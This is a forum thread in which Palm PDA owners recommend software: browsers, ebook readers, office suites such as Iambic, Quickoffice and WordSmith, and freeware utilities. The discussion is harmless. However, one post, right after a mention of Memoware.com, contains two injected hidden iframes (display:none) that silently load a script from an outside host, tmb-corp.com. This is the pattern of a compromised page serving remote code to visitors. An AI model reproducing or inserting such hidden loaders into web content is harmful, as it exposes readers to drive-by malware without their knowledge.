Killer Apps - developing the A List

Browser -- Blazer 2.0? -- AvantGo?
    ebook reader -- ?? Palm Reader ??
    Note-taker and reminder alarm -- BugMe
    Utilities -- JackFlash (compatible?)

Need:
    Spreadsheet compatible with MSExcel
    Small word processor compatible with MSWord

...and, a couple of passtimes/games for waiting rooms, etc.

What else??

I've seen some vast libraries of ebooks out there - truly a wonderful resource. Memoware.com is particularly noteworthy.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    <iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    The older I get, the better I was...

Avantgo is a good choice for content, plus it also has a built in browser - the browser may not be the best, but it works fine for me. Plus, AvantGo is an excellent tool to pull content you want, use your computer's internet connection for speed and cost, and read the content whenever you want to.

As for spreadsheet etc. - I had posted a message a few weeks ago for people to post their experience with "office" packages. I have tried Documents to Go, Quick Office, and Iambic Office. Of these three packages I chose Iambic.

Although it isn't nearly as popular, Iambic's spreadsheet is ultraquick, the included mail program allows a sender to attach an excel file or a word file, and you can open it, edit it, and send it back. (www.iambic.com)

Documents to Go takes too much memory (remember, we only have 8megs to work with)

Quickoffice is very slow if you have a large Excel file (which I do). Otherwise, it is a good package and is much more popular than Iambic.

by the way - if you only want word processing, check out wordsmith, probably the best MS Word compatible program on the Palm (http://www.bluenomad.com/)

What you REALLY need for this is...

Quickoffice for Palm, this converts MS docs and MS excel sheets into "Quicksheet" (excel) and "Quickword" (word) docs that can sync, edit twitch and modify back and forth between your PC and your Palm device. They are virtually indistinguishable form the MS apps we know and love... (!)

Alex

Cutting Edge Software

www.cesinc.com

didn't read entire previous post..

But I would agree about the speed with big spreadsheets, great tool overall though.

Alex

Don't forget the nifty freeware utilities like AlwaysOn, Benchmark, and OnCradleOn. Then there's McFile for file management, the indispensable Launcher, HandBase, chess and Scrabble in various incarnations, and all the clever hacks regarding which I'm still waiting for someone to share his/her experiences.